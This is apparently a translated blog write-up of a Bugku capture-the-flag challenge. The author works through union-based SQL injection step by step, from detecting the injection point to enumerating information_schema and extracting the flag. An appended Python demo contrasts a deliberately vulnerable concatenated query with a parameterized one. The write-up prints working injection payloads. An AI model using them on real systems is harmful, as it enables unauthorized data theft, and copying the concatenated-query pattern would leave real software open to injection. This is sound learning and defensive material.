BUGKU ----- Transcript

It is the third day of summer vacation, and I am starting the break by working through practice challenges. After three months of studying security I still need to shore up the basics, so I came to Bugku to work through a few problems.
Opening the challenge, one look shows it is SQL injection. Without further ado, straight to the payloads.
**Basics:**
Before working the problem, a word on the basics:
MySQL has an information database (`information_schema`, used in the steps below) with three tables that matter here, each with one field to remember. (Figure omitted.)

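1' // 1' returns an error, which shows that an injection point exists.

2.

1'--+ // With the comment added there should be no error, so why is there one? Because the comment is being filtered. So we can use
# or -- + (note the space in the middle) instead; the result comes back normal, which shows the guess is correct.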

3.

1' order by 4# // Next we guess the number of columns. Why try 4 first? Because the table shows three columns, plus the "so-and-so's transcript" column.

1' order by 5# // Next we try 5 columns and find that it errors, so there are only four columns.

4.

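-1' union select 1,2,3,database()# // With the column count known, go straight to a union query. For a union query,
// note that the data in the first part must not exist (hence -1) for the following statement's result to come through. We can see the database name is revealed.

With the basics from the beginning in mind, there is another way to list the databases: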

-1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#


-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 
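// Note that in the tables table the field holding the database name is table_schema, while in the schemata table it is schema_name. This statement selects table names from the tables table of the information_schema database (information_schema.tables); where table_schema=database() restricts the result to tables in the current database.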

6.

-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666C3467#  
// Note on the hex value here: convert the table name to hex without including the quotes.

7.

-1' union select 1,2,3,skctf_flag from fl4g#
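
Why step 7 works and what stops it, as an added example that is not from the original post. The challenge's backend code is not shown, so the table layout, function names and flag value are constructed, and SQLite stands in for MySQL (hence `-- ` instead of `#`).

```python
import sqlite3

def make_db():
    """Constructed sample data: a 4-column score table plus a separate flag table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE scores (id INTEGER, math INTEGER, english INTEGER, chinese INTEGER);
        INSERT INTO scores VALUES (1, 60, 70, 80);
        CREATE TABLE fl4g (skctf_flag TEXT);
        INSERT INTO fl4g VALUES ('PLACEHOLDER_FLAG');
    """)
    return db

def lookup_vulnerable(db, student_id):
    # The input is pasted into the SQL text, so a quote inside it closes the
    # string literal and everything after it is parsed as SQL.
    sql = "SELECT id, math, english, chinese FROM scores WHERE id = '%s'" % student_id
    return db.execute(sql).fetchall()

def lookup_safe(db, student_id):
    # Bound parameter: the value travels separately from the SQL text and is
    # only ever compared against the id column.
    sql = "SELECT id, math, english, chinese FROM scores WHERE id = ?"
    return db.execute(sql, (student_id,)).fetchall()

# The input from step 7, with SQLite's "-- " comment in place of MySQL's "#".
PAYLOAD = "-1' union select 1,2,3,skctf_flag from fl4g-- "

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concatenated", lookup_vulnerable), ("parameterized", lookup_safe)):
        print(name, "normal id :", fn(db, "1"))
        print(name, "step-7 input:", fn(db, PAYLOAD))
```

With the concatenated query the second SELECT's row replaces the empty first result, exactly as in the walkthrough; with the bound parameter the same input is just an id that matches nothing.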


Summary:
As a beginner I have only learned the surface of SQL injection, but I still feel that injection statements should not be memorized by rote; it is better to understand the relationships between the database tables. (I did start out memorizing by rote and it did not stick, so I am working through it again over the summer.)


Origin blog.csdn.net/weixin_43803070/article/details/94635507